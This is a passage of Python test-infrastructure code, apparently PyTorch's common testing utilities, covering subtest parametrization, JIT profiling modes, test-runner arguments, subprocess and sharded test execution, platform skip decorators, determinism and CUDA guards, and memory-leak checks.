return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = device_cls.device_type if device_cls else ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
subtest_name = self._get_subtest_name(values, explicit_name=maybe_name)
test_name = '{}{}'.format(subtest_name, '_' + device_cls.device_type if device_cls else '')
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = (['--import-disabled-tests'] if IMPORT_DISABLED_TESTS else List[str]([]) +
['--import-slow-tests'] if IMPORT_SLOW_TESTS else List[str]([]))
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
if not TEST_WITH_ROCM:
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
else:
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if before != after:
warnings.warn('{} leaked {} bytes ROCm memory on device {}'.format(
self.name, after - before, i), RuntimeWarning)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
